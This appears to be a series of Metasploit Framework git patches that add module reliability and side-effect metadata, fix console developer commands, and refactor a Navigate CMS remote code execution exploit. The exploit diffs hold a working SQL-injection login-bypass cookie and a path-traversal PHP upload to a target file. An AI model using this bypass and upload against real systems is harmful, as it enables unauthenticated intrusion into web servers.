Use friendly error messages and also Open3.capture2e --- .../console/command_dispatcher/developer.rb | 20 ++++++++++++++----- 1 file changed, 15 insertions(+), 5 deletions(-) diff --git a/lib/msf/ui/console/command_dispatcher/developer.rb b/lib/msf/ui/console/command_dispatcher/developer.rb index 77b5178d73..3967cb3bc2 100644 --- a/lib/msf/ui/console/command_dispatcher/developer.rb +++ b/lib/msf/ui/console/command_dispatcher/developer.rb @@ -27,7 +27,15 @@ class Msf::Ui::Console::CommandDispatcher::Developer end def git? - File.directory?(File.join(Msf::Config.install_root, ".git")) && Msf::Util::Helper.which("git") + unless Msf::Util::Helper.which("git") + print_error "'git' is not found." + return false + end + + unless File.directory?(File.join(Msf::Config.install_root, ".git")) + print_error "Framework installation is not a git repository. \n Did you install using a nightly installer or package manager?" + return false + end end def local_editor @@ -57,12 +65,14 @@ class Msf::Ui::Console::CommandDispatcher::Developer def reload_diff_files unless git? - print_error 'No git repository found.' return end - files = %x(git diff --name-only).split("\n") - files.each do | file | - reload_file(file) + output, status = Open3.capture2e *%w(git diff --name-only) + if status.success? + files = output.split("\n") + files.each { |file| reload_file(file) } + else + print_error output end end From 583874d370d25c934222c98ec3dd5d0dabe220f0 Mon Sep 17 00:00:00 2001 From: Wei Chen Date: Wed, 26 Sep 2018 18:54:08 -0500 Subject: [PATCH 085/192] Update use of reliability/side-effects/stability metadata --- lib/msf/core/constants.rb | 6 +++--- lib/msf/core/module/reliability.rb | 4 ++++ lib/msf/core/module/side_effects.rb | 4 ++++ lib/msf/core/module/stability.rb | 4 ++++ lib/msf/core/modules/metadata/obj.rb | 11 +++++------ modules/auxiliary/admin/ms/ms08_059_his2006.rb | 5 ----- modules/auxiliary/gather/pimcore_creds_sqli.rb | 4 ++++ modules/exploits/windows/local/alpc_taskscheduler.rb | 6 ++++++ 8 files changed, 30 insertions(+), 14 deletions(-) diff --git a/lib/msf/core/constants.rb b/lib/msf/core/constants.rb index 8799bf6e40..11b47545d1 100644 --- a/lib/msf/core/constants.rb +++ b/lib/msf/core/constants.rb @@ -87,10 +87,10 @@ SCREEN_EFFECTS = 'screen-effects' # Reliability # -# The module is expected to work at first attempt -FIRST_ATTEMPT_SUCCESS = 'first-attempt-success' +# The module is may fail at first attempt +FIRST_ATTEMPT_FAIL = 'first-attempt-fail' # The module is expected to get a shell every time it fires -REPEATABLE = 'repeatable' +REPEATABLE_SESSION = 'repeatable-session' module HttpClients IE = "MSIE" diff --git a/lib/msf/core/module/reliability.rb b/lib/msf/core/module/reliability.rb index 53d4a830ab..bbf63f4195 100644 --- a/lib/msf/core/module/reliability.rb +++ b/lib/msf/core/module/reliability.rb @@ -11,4 +11,8 @@ module Msf::Module::Reliability def reliability self.class.reliability end + + def reliability_to_s + reliability * ', ' + end end \ No newline at end of file diff --git a/lib/msf/core/module/side_effects.rb b/lib/msf/core/module/side_effects.rb index e0acb3e974..78d938c4a7 100644 --- a/lib/msf/core/module/side_effects.rb +++ b/lib/msf/core/module/side_effects.rb @@ -12,4 +12,8 @@ module Msf::Module::SideEffects self.class.side_effects end + def side_effects_to_s + side_effects * ', ' + end + end diff --git a/lib/msf/core/module/stability.rb b/lib/msf/core/module/stability.rb index 21c5fbe5ed..557c2ee679 100644 --- a/lib/msf/core/module/stability.rb +++ b/lib/msf/core/module/stability.rb @@ -12,4 +12,8 @@ module Msf::Module::Stability self.class.stability end + def stability_to_s + stability * ', ' + end + end \ No newline at end of file diff --git a/lib/msf/core/modules/metadata/obj.rb b/lib/msf/core/modules/metadata/obj.rb index 29316a720f..80c38d3f8b 100644 --- a/lib/msf/core/modules/metadata/obj.rb +++ b/lib/msf/core/modules/metadata/obj.rb @@ -51,12 +51,6 @@ class Obj attr_reader :default_credential # @return [Hash] attr_reader :notes - # @return [Hash] - attr_reader :side_effects - # @return [Hash] - attr_reader :stability - # @return [Hash] - attr_reader :reliability def initialize(module_instance, obj_hash = nil) unless obj_hash.nil? @@ -102,6 +96,11 @@ class Obj @notes = module_instance.notes + if @name =~ /ms08_059_his2006/ + require 'pry' + pry.binding + end + # Due to potentially non-standard ASCII we force UTF-8 to ensure no problem with JSON serialization force_encoding(Encoding::UTF_8) end diff --git a/modules/auxiliary/admin/ms/ms08_059_his2006.rb b/modules/auxiliary/admin/ms/ms08_059_his2006.rb index 7b0712b00c..39ec949018 100644 --- a/modules/auxiliary/admin/ms/ms08_059_his2006.rb +++ b/modules/auxiliary/admin/ms/ms08_059_his2006.rb @@ -25,11 +25,6 @@ class MetasploitModule < Msf::Auxiliary [ 'OSVDB', '49068' ], [ 'URL', 'http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=745' ], ], - 'Notes' => - { - 'Reliability' => [ FIRST_ATTEMPT_SUCCESS, REPEATABLE], - 'SideEffects' => [ FILE_ON_DISK, TRACES_IN_LOGS] - }, 'DisclosureDate' => 'Oct 14 2008')) register_options( diff --git a/modules/auxiliary/gather/pimcore_creds_sqli.rb b/modules/auxiliary/gather/pimcore_creds_sqli.rb index 36ea456094..50c9f73332 100644 --- a/modules/auxiliary/gather/pimcore_creds_sqli.rb +++ b/modules/auxiliary/gather/pimcore_creds_sqli.rb @@ -31,6 +31,10 @@ class MetasploitModule < Msf::Auxiliary [ 'CVE', '2018-14058' ], [ 'EDB', '45208' ] ], + 'Notes' => + { + 'SideEffects' => [ MALICIOUS_INPUT_IN_LOG ] + }, 'DisclosureDate' => 'Aug 13, 2018' )) diff --git a/modules/exploits/windows/local/alpc_taskscheduler.rb b/modules/exploits/windows/local/alpc_taskscheduler.rb index 1df4352d66..ebe70aff82 100644 --- a/modules/exploits/windows/local/alpc_taskscheduler.rb +++ b/modules/exploits/windows/local/alpc_taskscheduler.rb @@ -52,6 +52,12 @@ class MetasploitModule < Msf::Exploit::Local ['CVE', '2018-8440'], ['URL', 'https://github.com/SandboxEscaper/randomrepo/'], ], + 'Notes' => + { + # It overwrites PrintConfig.dll, which makes it unusable. + 'Stability' => [ OS_RESOURCE_LOSS ], + 'Reliability' => [ REPEATABLE_SESSION ] + }, 'DisclosureDate' => 'Aug 27 2018', 'DefaultTarget' => 0, )) From 9064fac1ff4683e7bd5ffbc880f9a617c30aa6b5 Mon Sep 17 00:00:00 2001 From: Wei Chen Date: Wed, 26 Sep 2018 21:13:37 -0500 Subject: [PATCH 086/192] Fix code based on Will's feedback --- lib/msf/core/constants.rb | 6 +++--- lib/msf/core/module/reliability.rb | 2 +- lib/msf/core/module/side_effects.rb | 2 +- lib/msf/core/module/stability.rb | 2 +- modules/exploits/windows/local/alpc_taskscheduler.rb | 2 +- 5 files changed, 7 insertions(+), 7 deletions(-) diff --git a/lib/msf/core/constants.rb b/lib/msf/core/constants.rb index 11b47545d1..b6afeba538 100644 --- a/lib/msf/core/constants.rb +++ b/lib/msf/core/constants.rb @@ -58,11 +58,11 @@ CRASH_SAFE = 'crash-safe' # Module crashes service, but service restarts. CRASH_SERVICE_RESTARTS = 'crash-service-restarts' # Module crashes service, and service remains down. -CRASH_SERVICE_DEAD = 'crash-service-dead' +CRASH_SERVICE_DOWN = 'crash-service-down' # Module crashes the OS, but OS restarts. CRASH_OS_RESTARTS = 'crash-os-restarts' # Module crashes the OS, and OS remains down. -CRASH_OS_DEAD = 'crash-os-dead' +CRASH_OS_DOWN = 'crash-os-down' # Module causes a resource (such as a file or data in database) to be unavailable for the service. SERVICE_RESOURCE_LOSS = 'service-resource-loss' # Modules causes a resource (such as a file) to be unavailable for the OS. @@ -87,7 +87,7 @@ SCREEN_EFFECTS = 'screen-effects' # Reliability # -# The module is may fail at first attempt +# The module tends to fail to get a session at first attempt FIRST_ATTEMPT_FAIL = 'first-attempt-fail' # The module is expected to get a shell every time it fires REPEATABLE_SESSION = 'repeatable-session' diff --git a/lib/msf/core/module/reliability.rb b/lib/msf/core/module/reliability.rb index bbf63f4195..4b9778f492 100644 --- a/lib/msf/core/module/reliability.rb +++ b/lib/msf/core/module/reliability.rb @@ -4,7 +4,7 @@ module Msf::Module::Reliability module ClassMethods def reliability instance = self.new - instance.notes['Reliability'] ? instance.notes['Reliability'] : [] + instance.notes['Reliability'] || [] end end diff --git a/lib/msf/core/module/side_effects.rb b/lib/msf/core/module/side_effects.rb index 78d938c4a7..2c895ef6d5 100644 --- a/lib/msf/core/module/side_effects.rb +++ b/lib/msf/core/module/side_effects.rb @@ -4,7 +4,7 @@ module Msf::Module::SideEffects module ClassMethods def side_effects instance = self.new - instance.notes['SideEffects'] ? instance.notes['SideEffects'] : [] + instance.notes['SideEffects'] || [] end end diff --git a/lib/msf/core/module/stability.rb b/lib/msf/core/module/stability.rb index 557c2ee679..312c4bb0e1 100644 --- a/lib/msf/core/module/stability.rb +++ b/lib/msf/core/module/stability.rb @@ -4,7 +4,7 @@ module Msf::Module::Stability module ClassMethods def stability instance = self.new - instance.notes['Stability'] ? instance.notes['Stability'] : [] + instance.notes['Stability'] || [] end end diff --git a/modules/exploits/windows/local/alpc_taskscheduler.rb b/modules/exploits/windows/local/alpc_taskscheduler.rb index ebe70aff82..f5ad117494 100644 --- a/modules/exploits/windows/local/alpc_taskscheduler.rb +++ b/modules/exploits/windows/local/alpc_taskscheduler.rb @@ -54,7 +54,7 @@ class MetasploitModule < Msf::Exploit::Local ], 'Notes' => { - # It overwrites PrintConfig.dll, which makes it unusable. + # Exploit overwrites PrintConfig.dll, which makes it unusable. 'Stability' => [ OS_RESOURCE_LOSS ], 'Reliability' => [ REPEATABLE_SESSION ] }, From c0ddbba0493abfa962a308e1d0c8cc0f3de3cec2 Mon Sep 17 00:00:00 2001 From: Wei Chen Date: Wed, 26 Sep 2018 21:19:16 -0500 Subject: [PATCH 087/192] rm junk code --- lib/msf/core/modules/metadata/obj.rb | 5 ----- 1 file changed, 5 deletions(-) diff --git a/lib/msf/core/modules/metadata/obj.rb b/lib/msf/core/modules/metadata/obj.rb index 80c38d3f8b..870548ecfb 100644 --- a/lib/msf/core/modules/metadata/obj.rb +++ b/lib/msf/core/modules/metadata/obj.rb @@ -96,11 +96,6 @@ class Obj @notes = module_instance.notes - if @name =~ /ms08_059_his2006/ - require 'pry' - pry.binding - end - # Due to potentially non-standard ASCII we force UTF-8 to ensure no problem with JSON serialization force_encoding(Encoding::UTF_8) end From e34371c7d3e80d599db4c88fb19d47a8eaaf4416 Mon Sep 17 00:00:00 2001 From: Wei Chen Date: Wed, 26 Sep 2018 21:19:49 -0500 Subject: [PATCH 088/192] Add a newline --- lib/msf/core/module/stability.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/msf/core/module/stability.rb b/lib/msf/core/module/stability.rb index 312c4bb0e1..12d5fbfb40 100644 --- a/lib/msf/core/module/stability.rb +++ b/lib/msf/core/module/stability.rb @@ -16,4 +16,4 @@ module Msf::Module::Stability stability * ', ' end -end \ No newline at end of file +end From 31e9b831d8b72634b057425a9d6b022f3e93d675 Mon Sep 17 00:00:00 2001 From: Wei Chen Date: Wed, 26 Sep 2018 21:42:00 -0500 Subject: [PATCH 089/192] Change constant name --- lib/msf/core/constants.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/msf/core/constants.rb b/lib/msf/core/constants.rb index b6afeba538..82a6205dcf 100644 --- a/lib/msf/core/constants.rb +++ b/lib/msf/core/constants.rb @@ -73,7 +73,7 @@ OS_RESOURCE_LOSS = 'os-resource-loss' # # Modules leaves payload or a dropper on the target machine -PAYLOAD_ON_DISK = 'payload-on-disk' +ARTIFACTS_ON_DISK = 'artifacts-on-disk' # Module modifies some config file on the target machine CONFIG_CHANGES = 'config-changes' # Module leaves attack traces in a log file (Example: SQL injection data found in HTTP log) From f55483d17d730fa246c88f288da8fe97abd9689c Mon Sep 17 00:00:00 2001 From: Pyriphlegethon Date: Thu, 27 Sep 2018 10:56:26 +0200 Subject: [PATCH 090/192] Fix incorrect session_id extraction --- modules/exploits/multi/http/navigate_cms_rce.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/multi/http/navigate_cms_rce.rb b/modules/exploits/multi/http/navigate_cms_rce.rb index 952a3faff7..dd84ab0268 100644 --- a/modules/exploits/multi/http/navigate_cms_rce.rb +++ b/modules/exploits/multi/http/navigate_cms_rce.rb @@ -72,7 +72,7 @@ class MetasploitModule < Msf::Exploit::Remote fail_with(Failure::Unreachable, 'Unable to reach target') unless init session_id = init.get_cookies_parsed - .values.select { |v| v.to_s =~ /NVSID_/ }.first + .values.select { |v| v.to_s =~ /NVSID_/ }.first.first if init.code == 302 && session_id print_good('Login bypass successful') From 2b862971388b384c6ee84ee012c029ca4eabd16b Mon Sep 17 00:00:00 2001 From: Pyriphlegethon Date: Thu, 27 Sep 2018 11:09:07 +0200 Subject: [PATCH 091/192] Refactor --- .../exploit/multi/http/navigate_cms_rce.md | 5 ++- .../exploits/multi/http/navigate_cms_rce.rb | 34 +++++++++---------- 2 files changed, 21 insertions(+), 18 deletions(-) diff --git a/documentation/modules/exploit/multi/http/navigate_cms_rce.md b/documentation/modules/exploit/multi/http/navigate_cms_rce.md index abd42cfcee..66248b197c 100644 --- a/documentation/modules/exploit/multi/http/navigate_cms_rce.md +++ b/documentation/modules/exploit/multi/http/navigate_cms_rce.md @@ -1,6 +1,9 @@ ## Description -This module exploits insufficient sanitization in the database::protect method to bypass authentication. It then uses a path traversal vulnerability in navigate_upload.php that allows authenticated users to upload PHP files to arbitrary locations. Together these vulnerabilities allow an unauthenticated attacker to execute arbitrary PHP code remotely. This module was tested against Navigate CMS 2.8. +This module exploits insufficient sanitization in the database::protect method, of Navigate CMS versions 2.8 and prior, to bypass authentication. +It then uses a path traversal vulnerability in navigate_upload.php that allows authenticated users to upload PHP files to arbitrary locations. +Together these vulnerabilities allow an unauthenticated attacker to execute arbitrary PHP code remotely. +This module was tested against Navigate CMS 2.8. ## Vulnerable Application diff --git a/modules/exploits/multi/http/navigate_cms_rce.rb b/modules/exploits/multi/http/navigate_cms_rce.rb index dd84ab0268..243edf1457 100644 --- a/modules/exploits/multi/http/navigate_cms_rce.rb +++ b/modules/exploits/multi/http/navigate_cms_rce.rb @@ -13,7 +13,8 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => 'Navigate CMS Unauthenticated Remote Code Execution', 'Description' => %q( This module exploits insufficient sanitization in the database::protect - method to bypass authentication. + method, of Navigate CMS versions 2.8 and prior, to bypass authentication. + It then uses a path traversal vulnerability in navigate_upload.php that allows authenticated users to upload PHP files to arbitrary locations. Together these vulnerabilities allow an unauthenticated attacker to @@ -49,25 +50,27 @@ class MetasploitModule < Msf::Exploit::Remote ) end - def check - check_resp = send_request_cgi( - 'method' => 'GET', + def login_bypass + send_request_cgi( + 'method' => 'POST', + 'cookie' => 'navigate-user=\" OR TRUE--%20', 'uri' => normalize_uri(target_uri.path, '/login.php') ) + end - if check_resp && check_resp.body.include?('Navigate CMS v2.8') - return CheckCode::Appears + def check + check = login_bypass + + if check && + check.code == 302 + return CheckCode::Vulnerable end return CheckCode::Safe end def exploit - init = send_request_cgi( - 'method' => 'POST', - 'cookie' => 'navigate-user=\" OR TRUE--%20', - 'uri' => normalize_uri(target_uri.path, '/login.php') - ) + init = login_bypass fail_with(Failure::Unreachable, 'Unable to reach target') unless init @@ -83,7 +86,7 @@ class MetasploitModule < Msf::Exploit::Remote php = %() data = Rex::MIME::Message.new data.add_part(php, 'image/jpeg', nil, - 'form-data; name="file"; filename="test.jpg"') + "form-data; name=\"file\"; filename=\"#{rand_text_alphanumeric(10..15)}\"") data_post = data.to_s upload = send_request_cgi( @@ -100,12 +103,9 @@ class MetasploitModule < Msf::Exploit::Remote ) fail_with(Failure::Unreachable, 'Unable to reach target') unless upload + fail_with(Failure::Unknown, 'Upload unsuccessful') unless upload.code == 200 - if upload.code == 200 - print_good('Upload successful') - else - fail_with(Failure::Unknown, 'Upload unsuccessful') - end + print_good('Upload successful') print_status('Triggering payload...') send_request_cgi( From 82b1f40925b789865b5d66f389a8fec4aff45783 Mon Sep 17 00:00:00 2001 From: Pyriphlegethon Date: Thu, 27 Sep 2018 11:17:53 +0200 Subject: [PATCH 092/192] Add cleanup code --- modules/exploits/multi/http/navigate_cms_rce.rb | 16 ++++++++++++++++ 1 file changed, 16 insertions(+) diff --git a/modules/exploits/multi/http/navigate_cms_rce.rb b/modules/exploits/multi/http/navigate_cms_rce.rb index 243edf1457..5256461d67 100644 --- a/modules/exploits/multi/http/navigate_cms_rce.rb +++ b/modules/exploits/multi/http/navigate_cms_rce.rb @@ -113,4 +113,20 @@ class MetasploitModule < Msf::Exploit::Remote 'uri' => normalize_uri(target_uri.path, '/navigate_info.php') ) end + + def on_new_session(session) + super + if session.type != 'meterpreter' + print_error('Unable to restore navigate_info.php') + return + end + + session.core.use('stdapi') if !session.ext.aliases.include?('stdapi') + + begin + session.fs.file.open('navigate_info.php', 'w').write("") + rescue + print_error('Unable to restore navigate_info.php') + end + end end From 342cfe4199025c795a4bf16ddf8a4b9b1bc8c789 Mon Sep 17 00:00:00 2001 From: Pyriphlegethon Date: Thu, 27 Sep 2018 12:38:05 +0200 Subject: [PATCH 093/192] Refactor again --- .../exploits/multi/http/navigate_cms_rce.rb | 37 +++++++++++-------- 1 file changed, 21 insertions(+), 16 deletions(-) diff --git a/modules/exploits/multi/http/navigate_cms_rce.rb b/modules/exploits/multi/http/navigate_cms_rce.rb index 5256461d67..31accdefb6 100644 --- a/modules/exploits/multi/http/navigate_cms_rce.rb +++ b/modules/exploits/multi/http/navigate_cms_rce.rb @@ -51,18 +51,29 @@ class MetasploitModule < Msf::Exploit::Remote end def login_bypass - send_request_cgi( - 'method' => 'POST', - 'cookie' => 'navigate-user=\" OR TRUE--%20', + check_resp = send_request_cgi( + 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, '/login.php') ) + + login_bypass_resp = send_request_cgi( + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, '/login.php'), + 'cookie' => 'navigate-user=\" OR TRUE--%20' + ) + + if login_bypass_resp && + login_bypass_resp.code == 302 && + check_resp.body.include?('Navigate CMS') + session_id = login_bypass_resp.get_cookies_parsed + .values.select { |v| v.to_s =~ /NVSID_/ } + .first.first + return session_id + end end def check - check = login_bypass - - if check && - check.code == 302 + if login_bypass return CheckCode::Vulnerable end @@ -70,14 +81,9 @@ class MetasploitModule < Msf::Exploit::Remote end def exploit - init = login_bypass + session_id = login_bypass - fail_with(Failure::Unreachable, 'Unable to reach target') unless init - - session_id = init.get_cookies_parsed - .values.select { |v| v.to_s =~ /NVSID_/ }.first.first - - if init.code == 302 && session_id + if session_id print_good('Login bypass successful') else fail_with(Failure::NoAccess, 'Login bypass failed') @@ -91,13 +97,12 @@ class MetasploitModule < Msf::Exploit::Remote upload = send_request_cgi( 'method' => 'POST', - 'cookie' => init.get_cookies, + 'uri' => normalize_uri(target_uri.path, '/navigate_upload.php'), 'vars_get' => Hash[{ 'session_id' => session_id, 'engine' => 'picnik', 'id' => '../../../navigate_info.php' }.to_a.shuffle], - 'uri' => normalize_uri(target_uri.path, '/navigate_upload.php'), 'ctype' => "multipart/form-data; boundary=#{data.bound}", 'data' => data_post ) From 7f9b9be78b7de1be3cc941c36ee213681d16d54d Mon Sep 17 00:00:00 2001 From: Erin Bleiweiss Date: Thu, 27 Sep 2018 11:12:10 -0500 Subject: [PATCH 094/192] Allow git? to return true --- lib/msf/ui/console/command_dispatcher/developer.rb | 2 ++ 1 file changed, 2 insertions(+) diff --git a/lib/msf/ui/console/command_dispatcher/developer.rb b/lib/msf/ui/console/command_dispatcher/developer.rb index 3967cb3bc2..42bcb767e2 100644 --- a/lib/msf/ui/console/command_dispatcher/developer.rb +++ b/lib/msf/ui/console/command_dispatcher/developer.rb @@ -36,6 +36,8 @@ class Msf::Ui::Console::CommandDispatcher::Developer print_error "Framework installation is not a git repository. \n Did you install using a nightly installer or package manager?" return false end + + true end def local_editor From c5c1706636cd456c3f17b1d1a89ac684b0e2e035 Mon Sep 17 00:00:00 2001 From: Erin Bleiweiss Date: Thu, 27 Sep 2018 11:14:01 -0500 Subject: [PATCH 095/192] Acutally, get rid of git? check --- .../console/command_dispatcher/developer.rb | 19 +------------------ 1 file changed, 1 insertion(+), 18 deletions(-) diff --git a/lib/msf/ui/console/command_dispatcher/developer.rb b/lib/msf/ui/console/command_dispatcher/developer.rb index 42bcb767e2..3d2a05bf22 100644 --- a/lib/msf/ui/console/command_dispatcher/developer.rb +++ b/lib/msf/ui/console/command_dispatcher/developer.rb @@ -26,20 +26,6 @@ class Msf::Ui::Console::CommandDispatcher::Developer } end - def git? - unless Msf::Util::Helper.which("git") - print_error "'git' is not found." - return false - end - - unless File.directory?(File.join(Msf::Config.install_root, ".git")) - print_error "Framework installation is not a git repository. \n Did you install using a nightly installer or package manager?" - return false - end - - true - end - def local_editor framework.datastore['LocalEditor'] || Rex::Compat.getenv('VISUAL') || Rex::Compat.getenv('EDITOR') end @@ -66,15 +52,12 @@ class Msf::Ui::Console::CommandDispatcher::Developer end def reload_diff_files - unless git? - return - end output, status = Open3.capture2e *%w(git diff --name-only) if status.success? files = output.split("\n") files.each { |file| reload_file(file) } else - print_error output + print_error "Git is not available." end end From 7ba73ef65841ee892dd1ef15bfe36203ebecb335 Mon Sep 17 00:00:00 2001 From: Erin Bleiweiss Date: Thu, 27 Sep 2018 12:01:04 -0500 Subject: [PATCH 096/192] Check for valid files in git command --- lib/msf/ui/console/command_dispatcher/developer.rb | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) diff --git a/lib/msf/ui/console/command_dispatcher/developer.rb b/lib/msf/ui/console/command_dispatcher/developer.rb index 3d2a05bf22..cd5906c00f 100644 --- a/lib/msf/ui/console/command_dispatcher/developer.rb +++ b/lib/msf/ui/console/command_dispatcher/developer.rb @@ -35,15 +35,16 @@ class Msf::Ui::Console::CommandDispatcher::Developer end # XXX: This will try to reload *any* .rb and break on modules - def reload_file(path) + # If silent is true, errors will not be printed + def reload_file(path, silent=false) unless File.exist?(path) && path.end_with?('.rb') - print_error("#{path} must exist and be a .rb file") + print_error("#{path} must exist and be a .rb file") unless silent return end # The file must exist to reach this, so we try our best here if path =~ %r{^(?:\./)?modules/} - print_error("Reloading Metasploit modules is not supported (try 'reload')") + print_error("Reloading Metasploit modules is not supported (try 'reload')") unless silent return end @@ -52,10 +53,10 @@ class Msf::Ui::Console::CommandDispatcher::Developer end def reload_diff_files - output, status = Open3.capture2e *%w(git diff --name-only) + output, status = Open3.capture2e *%w(git diff --name-only -- '*.rb' ':!modules') if status.success? files = output.split("\n") - files.each { |file| reload_file(file) } + files.each { |file| reload_file(file, true) } else print_error "Git is not available." end @@ -209,7 +210,6 @@ class Msf::Ui::Console::CommandDispatcher::Developer # Reload one or more library files from specified paths # def cmd_reload_lib(*args) - opts = OptionParser.new do |opts| opts.banner = 'Usage: reload_lib lib/to/reload.rb [...]' opts.separator 'Reload one or more library files from specified paths.' From 7a00e64ac3cb7988fef5a97af4ae6181150842bf Mon Sep 17 00:00:00 2001 From: Metasploit Date: Thu, 27 Sep 2018 10:05:46 -0700 Subject: [PATCH 097/192] Weekly dependency update --- Gemfile.lock | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/Gemfile.lock b/Gemfile.lock index f997c6317c..3d7a9ebac5 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -232,7 +232,7 @@ GEM thor (>= 0.18.1, < 2.0) rake (12.3.1) rb-readline (0.5.5) - recog (2.1.22) + recog (2.1.23) nokogiri redcarpet (3.4.0) rex-arch (0.1.13) @@ -305,7 +305,7 @@ GEM rspec-rerun (1.1.0) rspec (~> 3.0) rspec-support (3.8.0) - ruby-macho (2.0.0) + ruby-macho (2.1.0) ruby-rc4 (0.1.5) ruby_smb (1.0.4) bindata From 086e2b311bfe8f0c4c359c86de19435ad70aa065 Mon Sep 17 00:00:00 2001 From: Wei Chen Date: Thu, 27 Sep 2018 12:31:04 -0500 Subject: [PATCH 098/192] Update constants --- lib/msf/core/constants.rb | 18 +++++++++--------- modules/auxiliary/gather/pimcore_creds_sqli.rb | 2 +- 2 files changed, 10 insertions(+), 10 deletions(-) diff --git a/lib/msf/core/constants.rb b/lib/msf/core/constants.rb index 82a6205dcf..61f0f448e5 100644 --- a/lib/msf/core/constants.rb +++ b/lib/msf/core/constants.rb @@ -53,19 +53,19 @@ RankingName = # Stability traits # -# Module does not crash the service +# Module should not crash the service CRASH_SAFE = 'crash-safe' -# Module crashes service, but service restarts. +# Module may crash the service, but the service restarts. CRASH_SERVICE_RESTARTS = 'crash-service-restarts' -# Module crashes service, and service remains down. +# Module may crash the service, and the service remains down. CRASH_SERVICE_DOWN = 'crash-service-down' -# Module crashes the OS, but OS restarts. +# Module may crash the OS, but the OS restarts. CRASH_OS_RESTARTS = 'crash-os-restarts' -# Module crashes the OS, and OS remains down. +# Module may crash the OS, and the OS remains down. CRASH_OS_DOWN = 'crash-os-down' -# Module causes a resource (such as a file or data in database) to be unavailable for the service. +# Module may cause a resource (such as a file or data in database) to be unavailable for the service. SERVICE_RESOURCE_LOSS = 'service-resource-loss' -# Modules causes a resource (such as a file) to be unavailable for the OS. +# Modules may cause a resource (such as a file) to be unavailable for the OS. OS_RESOURCE_LOSS = 'os-resource-loss' # @@ -77,9 +77,9 @@ ARTIFACTS_ON_DISK = 'artifacts-on-disk' # Module modifies some config file on the target machine CONFIG_CHANGES = 'config-changes' # Module leaves attack traces in a log file (Example: SQL injection data found in HTTP log) -MALICIOUS_INPUT_IN_LOG = 'malicious-input-in-log' +IOC_IN_LOGS = 'inc-in-logs' # Module may cause account lockouts (likely due to brute-forcing) -LOCKOUTS = 'lockouts' +ACCOUNT_LOCKOUTS = 'account-lockouts' # Module may show something on the screen (Example: a window pops up) SCREEN_EFFECTS = 'screen-effects' diff --git a/modules/auxiliary/gather/pimcore_creds_sqli.rb b/modules/auxiliary/gather/pimcore_creds_sqli.rb index 50c9f73332..eae64933ce 100644 --- a/modules/auxiliary/gather/pimcore_creds_sqli.rb +++ b/modules/auxiliary/gather/pimcore_creds_sqli.rb @@ -33,7 +33,7 @@ class MetasploitModule < Msf::Auxiliary ], 'Notes' => { - 'SideEffects' => [ MALICIOUS_INPUT_IN_LOG ] + 'SideEffects' => [ IOC_IN_LOGS ] }, 'DisclosureDate' => 'Aug 13, 2018' )) From 974a7278622fdbe0a3ab66d58979f007a5eec4a9 Mon Sep 17 00:00:00 2001 From: Wei Chen Date: Thu, 27 Sep 2018 12:32:43 -0500 Subject: [PATCH 099/192] Update comment --- lib/msf/core/constants.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/msf/core/constants.rb b/lib/msf/core/constants.rb index 61f0f448e5..f795efa1c2 100644 --- a/lib/msf/core/constants.rb +++ b/lib/msf/core/constants.rb @@ -76,7 +76,7 @@ OS_RESOURCE_LOSS = 'os-resource-loss' ARTIFACTS_ON_DISK = 'artifacts-on-disk' # Module modifies some config file on the target machine CONFIG_CHANGES = 'config-changes' -# Module leaves attack traces in a log file (Example: SQL injection data found in HTTP log) +# Module leaves signs of a compromise in a log file (Example: SQL injection data found in HTTP log) IOC_IN_LOGS = 'inc-in-logs' # Module may cause account lockouts (likely due to brute-forcing) ACCOUNT_LOCKOUTS = 'account-lockouts' From a2694555d0bdcb371424afa610609d92bcd0f1bb Mon Sep 17 00:00:00 2001 From: Wei Chen Date: Thu, 27 Sep 2018 12:45:17 -0500 Subject: [PATCH 100/192] Change typo --- lib/msf/core/constants.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/msf/core/constants.rb b/lib/msf/core/constants.rb index f795efa1c2..f2a2416b65 100644 --- a/lib/msf/core/constants.rb +++ b/lib/msf/core/constants.rb @@ -77,7 +77,7 @@ ARTIFACTS_ON_DISK = 'artifacts-on-disk' # Module modifies some config file on the target machine CONFIG_CHANGES = 'config-changes' # Module leaves signs of a compromise in a log file (Example: SQL injection data found in HTTP log) -IOC_IN_LOGS = 'inc-in-logs' +IOC_IN_LOGS = 'ioc-in-logs' # Module may cause account lockouts (likely due to brute-forcing) ACCOUNT_LOCKOUTS = 'account-lockouts' # Module may show something on the screen (Example: a window pops up) From 64c86ef4de81dd54e10e5a2beac524d361f93665 Mon Sep 17 00:00:00 2001 From: Erin Bleiweiss Date: Thu, 27 Sep 2018 13:05:23 -0500 Subject: [PATCH 101/192] Add support for working outside install directory --- lib/msf/ui/console/command_dispatcher/developer.rb | 7 +++++-- 1 file changed, 5 insertions(+), 2 deletions(-) diff --git a/lib/msf/ui/console/command_dispatcher/developer.rb b/lib/msf/ui/console/command_dispatcher/developer.rb index cd5906c00f..df8686f260 100644 --- a/lib/msf/ui/console/command_dispatcher/developer.rb +++ b/lib/msf/ui/console/command_dispatcher/developer.rb @@ -53,10 +53,13 @@ class Msf::Ui::Console::CommandDispatcher::Developer end def reload_diff_files - output, status = Open3.capture2e *%w(git diff --name-only -- '*.rb' ':!modules') + output, status = Open3.capture2e(*%w(git diff --name-only *.rb :!modules), chdir: Msf::Config.install_root) if status.success? files = output.split("\n") - files.each { |file| reload_file(file, true) } + files.each do |file| + f = File.join(Msf::Config.install_root, file) + reload_file(f, true) + end else print_error "Git is not available." end From 3ca95933a19df25340ff2a6305c6f7282d82280a Mon Sep 17 00:00:00 2001 From: Erin Bleiweiss Date: Thu, 27 Sep 2018 13:13:25 -0500 Subject: [PATCH 102/192] Update help text. --- lib/msf/ui/console/command_dispatcher/developer.rb | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/lib/msf/ui/console/command_dispatcher/developer.rb b/lib/msf/ui/console/command_dispatcher/developer.rb index df8686f260..7b5091f8fa 100644 --- 